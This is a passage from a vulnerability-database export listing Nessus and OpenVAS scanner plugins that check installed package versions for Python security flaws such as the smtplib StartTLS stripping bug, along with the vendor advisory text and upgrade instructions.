the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have allowed man-in-the-middle attackers to bypass the TLS protections by leveraging a network position to block the StartTLS command.\n\nFor Debian 7 'Wheezy', this issue has been fixed in python3.2 version 3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-09T00:00:00", "id": "DEBIAN_DLA-871.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=97966", "published": "2017-03-27T00:00:00", "title": "Debian DLA-871-1 : python3.2 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-871-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97966);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/07/09 14:30:26\");\n\n script_cve_id(\"CVE-2016-0772\");\n\n script_name(english:\"Debian DLA-871-1 : python3.2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that there was a TLS stripping vulnerability in the\nsmptlib library distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might\nhave allowed man-in-the-middle attackers to bypass the TLS protections\nby leveraging a network position to block the StartTLS command.\n\nFor Debian 7 'Wheezy', this issue has been fixed in python3.2 version\n3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/python3.2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:idle-python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libpython3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"idle-python3.2\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libpython3.2\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-dbg\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-dev\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-doc\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-examples\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-minimal\", reference:\"3.2.3-7+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:29:21", "bulletinFamily": "scanner", "description": "This update for clamav-database on January 30th refreshes the database.\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "modified": "2017-02-06T00:00:00", "id": "OPENSUSE-2017-195.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96998", "published": "2017-02-06T00:00:00", "title": "openSUSE Security Update : clamav-database (openSUSE-2017-195)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-195.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96998);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/02/06 15:09:25 $\");\n\n script_name(english:\"openSUSE Security Update : clamav-database (openSUSE-2017-195)\");\n script_summary(english:\"Check for the openSUSE-2017-195 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for clamav-database on January 30th refreshes the\ndatabase.\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected clamav-database package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:clamav-database\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"clamav-database-201701300007-213.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"clamav-database-201701300007-34.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"clamav-database\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:29:01", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201701-18 (Python: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted index file using Python&rsquo;s dumbdbm module, possibly resulting in execution of arbitrary code with the privileges of the process.\n A remote attacker could entice a user to process a specially crafted input stream using Python&rsquo;s zipimporter module, possibly allowing attackers to cause unspecified impact.\n A man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2017-02-27T00:00:00", "id": "GENTOO_GLSA-201701-18.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96399", "published": "2017-01-11T00:00:00", "title": "GLSA-201701-18 : Python: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201701-18.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96399);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2017/02/27 15:13:33 $\");\n\n script_cve_id(\"CVE-2016-0772\", \"CVE-2016-5636\");\n script_xref(name:\"GLSA\", value:\"201701-18\");\n\n script_name(english:\"GLSA-201701-18 : Python: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201701-18\n(Python: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Python. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted index\n file using Python&rsquo;s dumbdbm module, possibly resulting in execution of\n arbitrary code with the privileges of the process.\n A remote attacker could entice a user to process a specially crafted\n input stream using Python&rsquo;s zipimporter module, possibly allowing\n attackers to cause unspecified impact.\n A man in the middle attacker could strip out the STARTTLS command\n without generating an exception on the Python SMTP client application,\n preventing the establishment of the TLS layer.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201701-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Python 2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/python-2.7.12:2.7'\n All Python 3 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/python-3.4.5:3.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/python\", unaffected:make_list(\"ge 2.7.12\", \"ge 3.4.5\"), vulnerable:make_list(\"lt 3.4.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Python\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-05T05:41:31", "bulletinFamily": "scanner", "description": "New python packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "modified": "2018-09-04T00:00:00", "published": "2016-12-29T00:00:00", "id": "SLACKWARE_SSA_2016-363-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96165", "title": "Slackware 14.0 / 14.1 / 14.2 / current : python (SSA:2016-363-01) (httpoxy)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-363-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96165);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/09/04 13:20:08\");\n\n script_cve_id(\"CVE-2016-1000110\", \"CVE-2016-2183\");\n script_xref(name:\"SSA\", value:\"2016-363-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : python (SSA:2016-363-01) (httpoxy)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New python packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.443792\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3996d036\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.13\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-03-19T12:27:17", "bulletinFamily": "scanner", "description": "It was discovered that there was a TLS stripping vulnerability in the smptlib\nlibrary distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have\nallowed man-in-the-middle attackers to bypass the TLS protections by leveraging\na network position to block the StartTLS command.", "modified": "2019-03-18T00:00:00", "published": "2018-01-12T00:00:00", "id": "OPENVAS:1361412562310890871", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890871", "title": "Debian LTS Advisory ([SECURITY] [DLA 871-1] python3.2 security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_871.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 871-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890871\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2016-0772\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 871-1] python3.2 security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-12 00:00:00 +0100 (Fri, 12 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00029.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"python3.2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', this issue has been fixed in python3.2 version\n3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that there was a TLS stripping vulnerability in the smptlib\nlibrary distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have\nallowed man-in-the-middle attackers to bypass the TLS protections by leveraging\na network position to block the StartTLS command.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"idle-python3.2\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libpython3.2\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-dbg\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-dev\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-doc\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-examples\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-26T14:36:27", "bulletinFamily": "scanner", "description": "Splunk Light is prone to multiple vulnerabilities in Python.", "modified": "2018-10-26T00:00:00", "published": "2017-01-24T00:00:00", "id": "OPENVAS:1361412562310106540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106540", "title": "Splunk Light Python Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_splunk_light_python_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Splunk Light Python Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:splunk:light';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106540\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-24 10:40:31 +0700 (Tue, 24 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5636\", \"CVE-2016-5699\", \"CVE-2016-0772\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Splunk Light Python Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_splunk_light_detect.nasl\");\n script_mandatory_keys(\"SplunkLight/installed\");\n\n script_tag(name:\"summary\", value:\"Splunk Light is prone to multiple vulnerabilities in Python.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Splunk Light is prone to multiple vulnerabilities in Python:\n\n - Integer overflow in the get_data function in zipimport.c in Python allows remote attackers to have unspecified\nimpact via a negative data size value, which triggers a heap-based buffer overflow. (CVE-2016-5636)\n\n - CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in Python allows\nremote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL. (CVE-2016-5699)\n\n - The smtplib library in Python does not return an error when StartTLS fails, which might allow man-in-the-middle\nattackers to bypass the TLS protections by leveraging a network position between the client and the registry to\nblock the StartTLS command, aka a 'StartTLS stripping attack'. (CVE-2016-0772)\");\n\n script_tag(name:\"affected\", value:\"Splunk Light prior to version 6.5.1\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.5.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.splunk.com/view/SP-CAAAPSR\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"6.5.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.5.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:37:00", "bulletinFamily": "scanner", "description": "Splunk Enterprise is prone to multiple vulnerabilities in Python.", "modified": "2018-10-26T00:00:00", "published": "2017-01-24T00:00:00", "id": "OPENVAS:1361412562310106539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106539", "title": "Splunk Enterprise Python Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_splunk_enterprise_python_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Splunk Enterprise Python Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 